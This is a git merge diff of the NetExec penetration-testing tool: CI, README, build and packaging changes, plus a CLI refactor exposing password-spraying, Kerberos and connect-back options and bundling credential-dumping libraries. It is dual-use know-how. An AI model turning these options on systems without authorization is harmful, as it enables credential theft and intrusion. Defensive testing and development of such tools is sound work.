Merging main into fgpp and resolving conflicts
Commit a869c6f5e8
@@ -3,4 +3,4 @@
 ##########################################

 # default ownership:
-* @zblurx @Marshall-Hallenbeck @NeffIsBack
+* @zblurx @Marshall-Hallenbeck @NeffIsBack @mpgn
@@ -30,7 +30,7 @@ If applicable, add screenshots to help explain your problem.

 **NetExec info**
 - OS: [e.g. Kali]
-- Version of nxc [e.g. v1.5.2]
+- Version of nxc: [e.g. v1.5.2]
 - Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue

 **Additional context**
@@ -0,0 +1,30 @@
+name: Lint Python code with ruff
+# Caching source: https://gist.github.com/gh640/233a6daf68e9e937115371c0ecd39c61?permalink_comment_id=4529233#gistcomment-4529233
+
+on: [push, pull_request]
+
+jobs:
+  lint:
+    name: Lint Python code with ruff
+    runs-on: ubuntu-latest
+    if:
+      github.event_name == 'push' || github.event.pull_request.head.repo.full_name != github.repository
+
+    steps:
+      - uses: actions/checkout@v3
+      - name: Install poetry
+        run: |
+          pipx install poetry
+      - name: Set up Python
+        uses: actions/setup-python@v4
+        with:
+          python-version: 3.11
+          cache: poetry
+          cache-dependency-path: poetry.lock
+      - name: Install dependencies with dev group
+        run: |
+          poetry install --with dev
+      - name: Run ruff
+        run: |
+          poetry run ruff --version
+          poetry run ruff check . --preview
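The new workflow above simply installs the project with its dev dependency group and runs ruff over the whole repository. For reviewers who want to reproduce the check locally, here is a minimal sketch using Python's subprocess module (assuming poetry is already installed and the working directory is the repository root; running the same commands directly in a shell is equivalent):

```python
# Minimal local equivalent of the CI lint job above (assumes poetry is installed
# and the current directory is the repository root).
import subprocess

steps = [
    ["poetry", "install", "--with", "dev"],                 # install project + dev group (includes ruff)
    ["poetry", "run", "ruff", "--version"],                 # report the ruff version, as the workflow does
    ["poetry", "run", "ruff", "check", ".", "--preview"],   # lint the whole repository
]

for step in steps:
    print("+", " ".join(step))
    subprocess.run(step, check=True)  # stop on the first failing step, like the workflow
```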
@@ -9,13 +9,13 @@ jobs:
     name: NetExec Tests for Py${{ matrix.python-version }}
     runs-on: ${{ matrix.os }}
     strategy:
-      max-parallel: 4
+      max-parallel: 5
       matrix:
         os: [ubuntu-latest]
         python-version: ["3.7", "3.8", "3.9", "3.10", "3.11"]
     steps:
       - uses: actions/checkout@v3
-      - name: NetExec tests on ${{ matrix.os }}
+      - name: NetExec set up python on ${{ matrix.os }}
         uses: actions/setup-python@v4
         with:
           python-version: ${{ matrix.python-version }}
@@ -3,6 +3,7 @@ hash_spider_default.sqlite3
 *.bak
 *.log
 .venv
+pyvenv.cfg
 .vscode
 .idea
 # Byte-compiled / optimized / DLL files
@@ -57,9 +58,6 @@ coverage.xml
 *.mo
 *.pot

-# Django stuff:
-*.log
-
 # Sphinx documentation
 docs/_build/

LICENSE (4 changes)
@@ -1,5 +1,5 @@
-Copyright (c) 2023, Marshall-Hallenbeck, NeffIsBack, zblurx
-Copyright (c) 2022, byt3bl33d3r, mpgn_x64
+Copyright (c) 2023, Marshall-Hallenbeck, NeffIsBack, zblurx, mpgn_x64
+Copyright (c) 2022, byt3bl33d3r
 All rights reserved.

 Redistribution and use in source and binary forms, with or without
README.md (14 changes)
@@ -1,7 +1,8 @@
-![Supported Python versions](https://img.shields.io/badge/python-3.7+-blue.svg)
+![Supported Python versions](https://img.shields.io/badge/python-3.8+-blue.svg)
 [![Twitter](https://img.shields.io/twitter/follow/al3xn3ff?label=al3x_n3ff&style=social)](https://twitter.com/intent/follow?screen_name=al3x_n3ff)
 [![Twitter](https://img.shields.io/twitter/follow/_zblurx?label=_zblurx&style=social)](https://twitter.com/intent/follow?screen_name=_zblurx)
 [![Twitter](https://img.shields.io/twitter/follow/MJHallenbeck?label=MJHallenbeck&style=social)](https://twitter.com/intent/follow?screen_name=MJHallenbeck)
+[![Twitter](https://img.shields.io/twitter/follow/mpgn_x64?label=mpgn_x64&style=social)](https://twitter.com/intent/follow?screen_name=mpgn_x64)


 🚩 This is the open source repository of NetExec maintained by a community of passionate people
@@ -9,7 +10,7 @@

 This project was initially created in 2015 by @byt3bl33d3r, known as CrackMapExec. In 2019 @mpgn_x64 started maintaining the project for the next 4 years, adding a lot of great tools and features. In September 2023 he retired from maintaining the project.

-Along with many other contributers, we (NeffIsBack, Marshall-Hallenbeck, and zblurx) developed new features, bugfixes, and helped maintain the original project CrackMapExec.
+Along with many other contributors, we (NeffIsBack, Marshall-Hallenbeck, and zblurx) developed new features, bug fixes, and helped maintain the original project CrackMapExec.
 During this time, with both a private and public repository, community contributions were not easily merged into the project. The 6-8 month discrepancy between the code bases caused many development issues and heavily reduced community-driven development.
 With the end of mpgn's maintainer role, we (the remaining most active contributors) decided to maintain the project together as a fully free and open source project under the new name **NetExec** 🚀
 Going forward, our intent is to maintain a community-driven and maintained project with regular updates for everyone to use.
@@ -20,7 +21,7 @@ Going forward, our intent is to maintain a community-driven and maintained proje

 You are on the **latest up-to-date** repository of the project NetExec (nxc) ! 🎉

-- 🚧 If you want to report a problem, open un [Issue](https://github.com/Pennyw0rth/NetExec/issues)
+- 🚧 If you want to report a problem, open an [Issue](https://github.com/Pennyw0rth/NetExec/issues)
 - 🔀 If you want to contribute, open a [Pull Request](https://github.com/Pennyw0rth/NetExec/pulls)
 - 💬 If you want to discuss, open a [Discussion](https://github.com/Pennyw0rth/NetExec/discussions)

@@ -36,6 +37,12 @@ See the project's [wiki](https://netexec.wiki/) (in development) for documentati
 # Installation
 Please see the installation instructions on the [wiki](https://netexec.wiki/getting-started/installation) (in development)

+## Linux
+```
+sudo apt install pipx git
+pipx ensurepath
+pipx install git+https://github.com/Pennyw0rth/NetExec
+```
 # Development
 Development guidelines and recommendations in development
@@ -50,3 +57,4 @@ Awesome code contributors of NetExec:
 [![](https://github.com/zblurx.png?size=50)](https://github.com/zblurx)
 [![](https://github.com/NeffIsBack.png?size=50)](https://github.com/NeffIsBack)
 [![](https://github.com/Hackndo.png?size=50)](https://github.com/Hackndo)
+[![](https://github.com/XiaoliChan.png?size=50)](https://github.com/XiaoliChan)
@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 import os
 import shutil
 import subprocess
@@ -11,27 +8,26 @@ from pathlib import Path

 from shiv.bootstrap import Environment

-# from distutils.ccompiler import new_compiler
 from shiv.builder import create_archive
 from shiv.cli import __version__ as VERSION


 def build_nxc():
-    print("building nxc")
+    print("Building nxc")
     try:
         shutil.rmtree("bin")
         shutil.rmtree("build")
-    except Exception as e:
+    except FileNotFoundError:
         pass
+    except Exception as e:
+        print(f"Exception while removing bin & build: {e}")

     try:
-        print("remove useless files")
         os.mkdir("build")
         os.mkdir("bin")
         shutil.copytree("nxc", "build/nxc")

     except Exception as e:
-        print(e)
+        print(f"Exception while creating bin and build directories: {e}")
         return

     subprocess.run(
@@ -48,7 +44,6 @@ def build_nxc():
         check=True,
     )

-    # [shutil.rmtree(p) for p in Path("build").glob("**/__pycache__")]
     [shutil.rmtree(p) for p in Path("build").glob("**/*.dist-info")]

     env = Environment(
@@ -93,7 +88,7 @@ if __name__ == "__main__":
     try:
         build_nxc()
         build_nxcdb()
-    except:
+    except FileNotFoundError:
        pass
    finally:
        shutil.rmtree("build")
flake.lock (92 changes)
@@ -1,92 +0,0 @@
-{
-  "nodes": {
-    "flake-utils": {
-      "locked": {
-        "lastModified": 1649676176,
-        "narHash": "sha256-OWKJratjt2RW151VUlJPRALb7OU2S5s+f0vLj4o1bHM=",
-        "owner": "numtide",
-        "repo": "flake-utils",
-        "rev": "a4b154ebbdc88c8498a5c7b01589addc9e9cb678",
-        "type": "github"
-      },
-      "original": {
-        "owner": "numtide",
-        "repo": "flake-utils",
-        "type": "github"
-      }
-    },
-    "flake-utils_2": {
-      "locked": {
-        "lastModified": 1649676176,
-        "narHash": "sha256-OWKJratjt2RW151VUlJPRALb7OU2S5s+f0vLj4o1bHM=",
-        "owner": "numtide",
-        "repo": "flake-utils",
-        "rev": "a4b154ebbdc88c8498a5c7b01589addc9e9cb678",
-        "type": "github"
-      },
-      "original": {
-        "owner": "numtide",
-        "repo": "flake-utils",
-        "type": "github"
-      }
-    },
-    "nixpkgs": {
-      "locked": {
-        "lastModified": 1651248272,
-        "narHash": "sha256-rMqS47Q53lZQDDwrFgLnWI5E+GaalVt4uJfIciv140U=",
-        "owner": "NixOS",
-        "repo": "nixpkgs",
-        "rev": "8758d58df0798db2b29484739ca7303220a739d3",
-        "type": "github"
-      },
-      "original": {
-        "owner": "NixOS",
-        "repo": "nixpkgs",
-        "type": "github"
-      }
-    },
-    "nixpkgs_2": {
-      "locked": {
-        "lastModified": 1651248272,
-        "narHash": "sha256-rMqS47Q53lZQDDwrFgLnWI5E+GaalVt4uJfIciv140U=",
-        "owner": "NixOS",
-        "repo": "nixpkgs",
-        "rev": "8758d58df0798db2b29484739ca7303220a739d3",
-        "type": "github"
-      },
-      "original": {
-        "owner": "NixOS",
-        "repo": "nixpkgs",
-        "type": "github"
-      }
-    },
-    "poetry2nix": {
-      "inputs": {
-        "flake-utils": "flake-utils_2",
-        "nixpkgs": "nixpkgs_2"
-      },
-      "locked": {
-        "lastModified": 1651165059,
-        "narHash": "sha256-/psJg8NsEa00bVVsXiRUM8yL/qfu05zPZ+jJzm7hRTo=",
-        "owner": "nix-community",
-        "repo": "poetry2nix",
-        "rev": "ece2a41612347a4fe537d8c0a25fe5d8254835bd",
-        "type": "github"
-      },
-      "original": {
-        "owner": "nix-community",
-        "repo": "poetry2nix",
-        "type": "github"
-      }
-    },
-    "root": {
-      "inputs": {
-        "flake-utils": "flake-utils",
-        "nixpkgs": "nixpkgs",
-        "poetry2nix": "poetry2nix"
-      }
-    }
-  },
-  "root": "root",
-  "version": 7
-}
flake.nix (36 changes)
@@ -1,36 +0,0 @@
-{
-  description = "Application packaged using poetry2nix";
-
-  inputs.flake-utils.url = "github:numtide/flake-utils";
-  inputs.nixpkgs.url = "github:NixOS/nixpkgs";
-  inputs.poetry2nix.url = "github:nix-community/poetry2nix";
-
-  outputs = { self, nixpkgs, flake-utils, poetry2nix }:
-    {
-      # Nixpkgs overlay providing the application
-      overlay = nixpkgs.lib.composeManyExtensions [
-        poetry2nix.overlay
-        (final: prev: {
-          # The application
-          NetExec = prev.poetry2nix.mkPoetryApplication {
-            projectDir = ./.;
-          };
-        })
-      ];
-    } // (flake-utils.lib.eachDefaultSystem (system:
-      let
-        pkgs = import nixpkgs {
-          inherit system;
-          overlays = [ self.overlay ];
-        };
-      in
-      {
-        apps = {
-          NetExec = pkgs.NetExec;
-        };
-
-        defaultApp = pkgs.NetExec;
-
-        packages = { NetExec = pkgs.NetExec; };
-      }));
-}
@@ -13,6 +13,12 @@ a = Analysis(
         ('./nxc/modules', 'nxc/modules')
     ],
     hiddenimports=[
+        'aardwolf',
+        'aardwolf.connection',
+        'aardwolf.commons.queuedata.constants',
+        'aardwolf.commons.iosettings',
+        'aardwolf.commons.target',
+        'aardwolf.protocol.x224.constants',
         'impacket.examples.secretsdump',
         'impacket.dcerpc.v5.lsat',
         'impacket.dcerpc.v5.transport',
@@ -48,6 +54,7 @@ a = Analysis(
         'lsassy.parser',
         'lsassy.session',
         'lsassy.impacketfile',
+        'bloodhound',
         'dns',
         'dns.name',
         'dns.resolver',
@@ -64,6 +71,7 @@ a = Analysis(
         'dploot.lib.smb',
         'pyasn1_modules.rfc5652',
         'unicrypto.backends.pycryptodomex',
+        'sspilib.raw._text',
     ],
     hookspath=['./nxc/.hooks'],
     runtime_hooks=[],
@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 from PyInstaller.utils.hooks import collect_all

 datas, binaries, hiddenimports = collect_all("lsassy")
@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 from PyInstaller.utils.hooks import collect_all

 datas, binaries, hiddenimports = collect_all("pypykatz")
nxc/cli.py (196 changes)
@@ -1,25 +1,27 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 import argparse
+import argcomplete
 import sys
 from argparse import RawTextHelpFormatter
+from os import listdir
+from os.path import dirname
+from os.path import join as path_join
+import nxc
+from nxc.paths import NXC_PATH
 from nxc.loaders.protocolloader import ProtocolLoader
 from nxc.helpers.logger import highlight
-from termcolor import colored
 from nxc.logger import nxc_logger
 import importlib.metadata


 def gen_cli_args():
     VERSION = importlib.metadata.version("netexec")
-    CODENAME = "A New Beginning"
+    CODENAME = "nxc4u"

-    parser = argparse.ArgumentParser(description=f"""
+    parser = argparse.ArgumentParser(description=rf"""
     . .
     .| |. _ _ _ _____
     || || | \ | | ___ | |_ | ____| __ __ ___ ___
-    \\\( )// | \| | / _ \ | __| | _| \ \/ / / _ \ / __|
+    \\( )// | \| | / _ \ | __| | _| \ \/ / / _ \ / __|
     .=[ ]=. | |\ | | __/ | |_ | |___ > < | __/ | (__
     / /ॱ-ॱ\ \ |_| \_| \___| \__| |_____| /_/\_\ \___| \___|
     ॱ \ / ॱ
@@ -32,34 +34,12 @@ def gen_cli_args():

     {highlight('Version', 'red')} : {highlight(VERSION)}
     {highlight('Codename', 'red')}: {highlight(CODENAME)}
-    """,
-        formatter_class=RawTextHelpFormatter,
-    )
+    """, formatter_class=RawTextHelpFormatter)

-    parser.add_argument(
-        "-t",
-        type=int,
-        dest="threads",
-        default=100,
-        help="set how many concurrent threads to use (default: 100)",
-    )
-    parser.add_argument(
-        "--timeout",
-        default=None,
-        type=int,
-        help="max timeout in seconds of each thread (default: None)",
-    )
-    parser.add_argument(
-        "--jitter",
-        metavar="INTERVAL",
-        type=str,
-        help="sets a random delay between each connection (default: None)",
-    )
-    parser.add_argument(
-        "--no-progress",
-        action="store_true",
-        help="Not displaying progress bar during scan",
-    )
+    parser.add_argument("-t", type=int, dest="threads", default=100, help="set how many concurrent threads to use (default: 100)")
+    parser.add_argument("--timeout", default=None, type=int, help="max timeout in seconds of each thread (default: None)")
+    parser.add_argument("--jitter", metavar="INTERVAL", type=str, help="sets a random delay between each connection (default: None)")
+    parser.add_argument("--no-progress", action="store_true", help="Not displaying progress bar during scan")
     parser.add_argument("--verbose", action="store_true", help="enable verbose output")
     parser.add_argument("--debug", action="store_true", help="enable debug level information")
     parser.add_argument("--version", action="store_true", help="Display nxc version")
@@ -67,142 +47,68 @@ def gen_cli_args():
     # we do module arg parsing here so we can reference the module_list attribute below
     module_parser = argparse.ArgumentParser(add_help=False)
     mgroup = module_parser.add_mutually_exclusive_group()
-    mgroup.add_argument("-M", "--module", action="append", metavar="MODULE", help="module to use")
-    module_parser.add_argument(
-        "-o",
-        metavar="MODULE_OPTION",
-        nargs="+",
-        default=[],
-        dest="module_options",
-        help="module options",
-    )
+    mgroup.add_argument("-M", "--module", choices=get_module_names(), action="append", metavar="MODULE", help="module to use")
+    module_parser.add_argument("-o", metavar="MODULE_OPTION", nargs="+", default=[], dest="module_options", help="module options")
     module_parser.add_argument("-L", "--list-modules", action="store_true", help="list available modules")
-    module_parser.add_argument(
-        "--options",
-        dest="show_module_options",
-        action="store_true",
-        help="display module options",
-    )
-    module_parser.add_argument(
-        "--server",
-        choices={"http", "https"},
-        default="https",
-        help="use the selected server (default: https)",
-    )
-    module_parser.add_argument(
-        "--server-host",
-        type=str,
-        default="0.0.0.0",
-        metavar="HOST",
-        help="IP to bind the server to (default: 0.0.0.0)",
-    )
-    module_parser.add_argument(
-        "--server-port",
-        metavar="PORT",
-        type=int,
-        help="start the server on the specified port",
-    )
-    module_parser.add_argument(
-        "--connectback-host",
-        type=str,
-        metavar="CHOST",
-        help="IP for the remote system to connect back to (default: same as server-host)",
-    )
+    module_parser.add_argument("--options", dest="show_module_options", action="store_true", help="display module options")
+    module_parser.add_argument("--server", choices={"http", "https"}, default="https", help="use the selected server (default: https)")
+    module_parser.add_argument("--server-host", type=str, default="0.0.0.0", metavar="HOST", help="IP to bind the server to (default: 0.0.0.0)")
+    module_parser.add_argument("--server-port", metavar="PORT", type=int, help="start the server on the specified port")
+    module_parser.add_argument("--connectback-host", type=str, metavar="CHOST", help="IP for the remote system to connect back to (default: same as server-host)")

     subparsers = parser.add_subparsers(title="protocols", dest="protocol", description="available protocols")

     std_parser = argparse.ArgumentParser(add_help=False)
-    std_parser.add_argument(
-        "target",
-        nargs="+" if not (module_parser.parse_known_args()[0].list_modules or module_parser.parse_known_args()[0].show_module_options) else "*",
-        type=str,
-        help="the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, NMap XML or .Nessus file(s)",
-    )
-    std_parser.add_argument(
-        "-id",
-        metavar="CRED_ID",
-        nargs="+",
-        default=[],
-        type=str,
-        dest="cred_id",
-        help="database credential ID(s) to use for authentication",
-    )
-    std_parser.add_argument(
-        "-u",
-        metavar="USERNAME",
-        dest="username",
-        nargs="+",
-        default=[],
-        help="username(s) or file(s) containing usernames",
-    )
-    std_parser.add_argument(
-        "-p",
-        metavar="PASSWORD",
-        dest="password",
-        nargs="+",
-        default=[],
-        help="password(s) or file(s) containing passwords",
-    )
+    std_parser.add_argument("target", nargs="+" if not (module_parser.parse_known_args()[0].list_modules or module_parser.parse_known_args()[0].show_module_options) else "*", type=str, help="the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, NMap XML or .Nessus file(s)")
+    std_parser.add_argument("-id", metavar="CRED_ID", nargs="+", default=[], type=str, dest="cred_id", help="database credential ID(s) to use for authentication")
+    std_parser.add_argument("-u", metavar="USERNAME", dest="username", nargs="+", default=[], help="username(s) or file(s) containing usernames")
+    std_parser.add_argument("-p", metavar="PASSWORD", dest="password", nargs="+", default=[], help="password(s) or file(s) containing passwords")
     std_parser.add_argument("--ignore-pw-decoding", action="store_true", help="Ignore non UTF-8 characters when decoding the password file")
     std_parser.add_argument("-k", "--kerberos", action="store_true", help="Use Kerberos authentication")
     std_parser.add_argument("--no-bruteforce", action="store_true", help="No spray when using file for username and password (user1 => password1, user2 => password2")
     std_parser.add_argument("--continue-on-success", action="store_true", help="continues authentication attempts even after successes")
-    std_parser.add_argument(
-        "--use-kcache",
-        action="store_true",
-        help="Use Kerberos authentication from ccache file (KRB5CCNAME)",
-    )
+    std_parser.add_argument("--use-kcache", action="store_true", help="Use Kerberos authentication from ccache file (KRB5CCNAME)")
     std_parser.add_argument("--log", metavar="LOG", help="Export result into a custom file")
-    std_parser.add_argument(
-        "--aesKey",
-        metavar="AESKEY",
-        nargs="+",
-        help="AES key to use for Kerberos Authentication (128 or 256 bits)",
-    )
-    std_parser.add_argument(
-        "--kdcHost",
-        metavar="KDCHOST",
-        help="FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter",
-    )
+    std_parser.add_argument("--aesKey", metavar="AESKEY", nargs="+", help="AES key to use for Kerberos Authentication (128 or 256 bits)")
+    std_parser.add_argument("--kdcHost", metavar="KDCHOST", help="FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter")

     fail_group = std_parser.add_mutually_exclusive_group()
-    fail_group.add_argument(
-        "--gfail-limit",
-        metavar="LIMIT",
-        type=int,
-        help="max number of global failed login attempts",
-    )
-    fail_group.add_argument(
-        "--ufail-limit",
-        metavar="LIMIT",
-        type=int,
-        help="max number of failed login attempts per username",
-    )
-    fail_group.add_argument(
-        "--fail-limit",
-        metavar="LIMIT",
-        type=int,
-        help="max number of failed login attempts per host",
-    )
+    fail_group.add_argument("--gfail-limit", metavar="LIMIT", type=int, help="max number of global failed login attempts")
+    fail_group.add_argument("--ufail-limit", metavar="LIMIT", type=int, help="max number of failed login attempts per username")
+    fail_group.add_argument("--fail-limit", metavar="LIMIT", type=int, help="max number of failed login attempts per host")

     p_loader = ProtocolLoader()
     protocols = p_loader.get_protocols()

-    for protocol in protocols.keys():
-        try:
+    try:
+        for protocol in protocols:
             protocol_object = p_loader.load_protocol(protocols[protocol]["argspath"])
             subparsers = protocol_object.proto_args(subparsers, std_parser, module_parser)
-        except:
-            nxc_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol}")
+    except Exception as e:
+        nxc_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol} - {e}")

+    argcomplete.autocomplete(parser)
+    args = parser.parse_args()

     if len(sys.argv) == 1:
         parser.print_help()
         sys.exit(1)

-    args = parser.parse_args()
-
     if args.version:
         print(f"{VERSION} - {CODENAME}")
         sys.exit(1)

     return args


+def get_module_names():
+    """Get module names without initializing them"""
+    modules = []
+    modules_paths = [
+        path_join(dirname(nxc.__file__), "modules"),
+        path_join(NXC_PATH, "modules"),
+    ]
+
+    for path in modules_paths:
+        modules.extend([module[:-3] for module in listdir(path) if module[-3:] == ".py" and module != "example_module.py"])
+    return sorted(modules, key=str.casefold)
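Two details in the hunk above work together: `choices=get_module_names()` gives `-M` a fixed set of valid values, and `argcomplete.autocomplete(parser)`, called before `parse_args()`, turns those choices into shell tab completion. A minimal, self-contained sketch of that pattern; the hard-coded module names are stand-ins, not the real nxc module discovery:

```python
# Sketch of the choices + argcomplete pattern introduced above.
# The hard-coded module names are placeholders for illustration only.
import argparse
import argcomplete  # PYTHON_ARGCOMPLETE_OK

parser = argparse.ArgumentParser(prog="demo")
parser.add_argument("-M", "--module", choices=["example_a", "example_b"], action="append",
                    help="module to use")  # choices drive both validation and completion
argcomplete.autocomplete(parser)  # no-op unless shell completion is active
args = parser.parse_args()
print(args.module)
```

For completion to actually trigger, argcomplete's shell hook has to be registered (for example via `activate-global-python-argcomplete`); without it the call above is simply a no-op.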
@@ -1,8 +1,7 @@
-# coding=utf-8
 import os
 from os.path import join as path_join
 import configparser
-from nxc.paths import nxc_PATH, DATA_PATH
+from nxc.paths import NXC_PATH, DATA_PATH
 from nxc.first_run import first_run_setup
 from nxc.logger import nxc_logger
 from ast import literal_eval
@@ -11,11 +10,11 @@ nxc_default_config = configparser.ConfigParser()
 nxc_default_config.read(path_join(DATA_PATH, "nxc.conf"))

 nxc_config = configparser.ConfigParser()
-nxc_config.read(os.path.join(nxc_PATH, "nxc.conf"))
+nxc_config.read(os.path.join(NXC_PATH, "nxc.conf"))

 if "nxc" not in nxc_config.sections():
     first_run_setup()
-    nxc_config.read(os.path.join(nxc_PATH, "nxc.conf"))
+    nxc_config.read(os.path.join(NXC_PATH, "nxc.conf"))

 # Check if there are any missing options in the config file
 for section in nxc_default_config.sections():
@@ -24,10 +23,10 @@ for section in nxc_default_config.sections():
             nxc_logger.display(f"Adding missing option '{option}' in config section '{section}' to nxc.conf")
             nxc_config.set(section, option, nxc_default_config.get(section, option))

-    with open(path_join(nxc_PATH, "nxc.conf"), "w") as config_file:
+    with open(path_join(NXC_PATH, "nxc.conf"), "w") as config_file:
         nxc_config.write(config_file)

-#!!! THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE !!!
+# THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE
 nxc_workspace = nxc_config.get("nxc", "workspace", fallback="default")
 pwned_label = nxc_config.get("nxc", "pwn3d_label", fallback="Pwn3d!")
 audit_mode = nxc_config.get("nxc", "audit_mode", fallback=False)
@@ -44,5 +43,5 @@ if len(host_info_colors) != 4:

 # this should probably be put somewhere else, but if it's in the config helpers, there is a circular import
 def process_secret(text):
-    hidden = text[:reveal_chars_of_pwd]
-    return text if not audit_mode else hidden+audit_mode * 8
+    reveal = text[:reveal_chars_of_pwd]
+    return text if not audit_mode else reveal + (audit_mode if len(audit_mode) > 1 else audit_mode * 8)
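To make the last change above concrete: when `audit_mode` is set in nxc.conf, `process_secret()` now keeps only the first `reveal_chars_of_pwd` characters of a secret and pads the rest with the audit-mode character (or appends the configured string as-is when it is longer than one character). A small self-contained sketch of the same logic, with hard-coded stand-ins for the values normally read from the config:

```python
# Stand-ins for values normally read from nxc.conf; names mirror the diff above.
audit_mode = "#"          # a falsy value ("" or False) disables masking entirely
reveal_chars_of_pwd = 2   # how many leading characters of the secret stay visible

def process_secret(text):
    reveal = text[:reveal_chars_of_pwd]
    return text if not audit_mode else reveal + (audit_mode if len(audit_mode) > 1 else audit_mode * 8)

print(process_secret("Summer2023!"))  # -> "Su########"
```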
@@ -1,22 +1,19 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-
 import random
-import socket
-from socket import AF_INET, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME
-from socket import getaddrinfo
 from os.path import isfile
 from threading import BoundedSemaphore
 from functools import wraps
 from time import sleep
 from ipaddress import ip_address
+from socket import AF_UNSPEC, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME, getaddrinfo

 from nxc.config import pwned_label
 from nxc.helpers.logger import highlight
 from nxc.logger import nxc_logger, NXCAdapter
 from nxc.context import Context
+from nxc.protocols.ldap.laps import laps_search

 from impacket.dcerpc.v5 import transport
+import sys

 sem = BoundedSemaphore(1)
 global_failed_logins = 0
@@ -24,40 +21,49 @@ user_failed_logins = {}


 def gethost_addrinfo(hostname):
-    try:
-        for res in getaddrinfo( hostname, None, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):
-            af, socktype, proto, canonname, sa = res
-            host = canonname if ip_address(sa[0]).is_link_local else sa[0]
-    except socket.gaierror:
-        for res in getaddrinfo( hostname, None, AF_INET, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):
-            af, socktype, proto, canonname, sa = res
-            host = sa[0] if sa[0] else canonname
-    return host
+    is_ipv6 = False
+    is_link_local_ipv6 = False
+    address_info = {"AF_INET6": "", "AF_INET": ""}
+
+    for res in getaddrinfo(hostname, None, AF_UNSPEC, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):
+        af, _, _, canonname, sa = res
+        address_info[af.name] = sa[0]
+
+    # IPv4 preferred
+    if address_info["AF_INET"]:
+        host = address_info["AF_INET"]
+    else:
+        is_ipv6 = True
+        host, is_link_local_ipv6 = (canonname, True) if ip_address(address_info["AF_INET6"]).is_link_local else (address_info["AF_INET6"], False)
+
+    return host, is_ipv6, is_link_local_ipv6


 def requires_admin(func):
     def _decorator(self, *args, **kwargs):
         if self.admin_privs is False:
-            return
+            return None
         return func(self, *args, **kwargs)

     return wraps(func)(_decorator)


 def dcom_FirewallChecker(iInterface, timeout):
     stringBindings = iInterface.get_cinstance().get_string_bindings()
     for strBinding in stringBindings:
-        if strBinding['wTowerId'] == 7:
-            if strBinding['aNetworkAddr'].find('[') >= 0:
-                binding, _, bindingPort = strBinding['aNetworkAddr'].partition('[')
-                bindingPort = '[' + bindingPort
+        if strBinding["wTowerId"] == 7:
+            if strBinding["aNetworkAddr"].find("[") >= 0:
+                binding, _, bindingPort = strBinding["aNetworkAddr"].partition("[")
+                bindingPort = "[" + bindingPort
             else:
-                binding = strBinding['aNetworkAddr']
-                bindingPort = ''
+                binding = strBinding["aNetworkAddr"]
+                bindingPort = ""

             if binding.upper().find(iInterface.get_target().upper()) >= 0:
-                stringBinding = 'ncacn_ip_tcp:' + strBinding['aNetworkAddr'][:-1]
+                stringBinding = "ncacn_ip_tcp:" + strBinding["aNetworkAddr"][:-1]
                 break
-            elif iInterface.is_fqdn() and binding.upper().find(iInterface.get_target().upper().partition('.')[0]) >= 0:
-                stringBinding = 'ncacn_ip_tcp:%s%s' % (iInterface.get_target(), bindingPort)
+            elif iInterface.is_fqdn() and binding.upper().find(iInterface.get_target().upper().partition(".")[0]) >= 0:
+                stringBinding = f"ncacn_ip_tcp:{iInterface.get_target()}{bindingPort}"
     if "stringBinding" not in locals():
         return True, None
     try:
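The rewritten `gethost_addrinfo()` above resolves both address families in a single `AF_UNSPEC` lookup, prefers IPv4, and only falls back to IPv6 (using the canonical name for link-local addresses) when no IPv4 address comes back. A standalone sketch of that resolution order, runnable outside nxc and mirroring the diff's behaviour (it assumes the name resolves to at least one address):

```python
# Minimal sketch of the resolution strategy used above: one AF_UNSPEC lookup,
# prefer IPv4, otherwise fall back to IPv6 (canonical name for link-local addresses).
from ipaddress import ip_address
from socket import AF_UNSPEC, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME, getaddrinfo

def resolve(hostname):
    address_info = {"AF_INET6": "", "AF_INET": ""}
    canonname = hostname
    for af, _, _, canonname, sa in getaddrinfo(hostname, None, AF_UNSPEC, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):
        address_info[af.name] = sa[0]  # af.name is "AF_INET" or "AF_INET6"

    if address_info["AF_INET"]:                      # IPv4 preferred
        return address_info["AF_INET"], False, False
    is_link_local = ip_address(address_info["AF_INET6"]).is_link_local
    host = canonname if is_link_local else address_info["AF_INET6"]
    return host, True, is_link_local                 # host, is_ipv6, is_link_local_ipv6

print(resolve("localhost"))
```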
@@ -65,22 +71,25 @@ def dcom_FirewallChecker(iInterface, timeout):
         rpctransport.set_connect_timeout(timeout)
         rpctransport.connect()
         rpctransport.disconnect()
-    except:
+    except Exception as e:
+        nxc_logger.debug(f"Exception while connecting to {stringBinding}: {e}")
         return False, stringBinding
     else:
         return True, stringBinding

-class connection(object):
+
+class connection:
     def __init__(self, args, db, host):
         self.domain = None
         self.args = args
         self.db = db
         self.hostname = host
+        self.port = self.args.port
         self.conn = None
         self.admin_privs = False
-        self.password = ""
-        self.username = ""
-        self.kerberos = True if self.args.kerberos or self.args.use_kcache or self.args.aesKey else False
+        self.password = None
+        self.username = None
+        self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey)
         self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
         self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost
         self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
@@ -89,10 +98,10 @@ class connection(object):
         self.logger = nxc_logger

         try:
-            self.host = gethost_addrinfo(self.hostname)
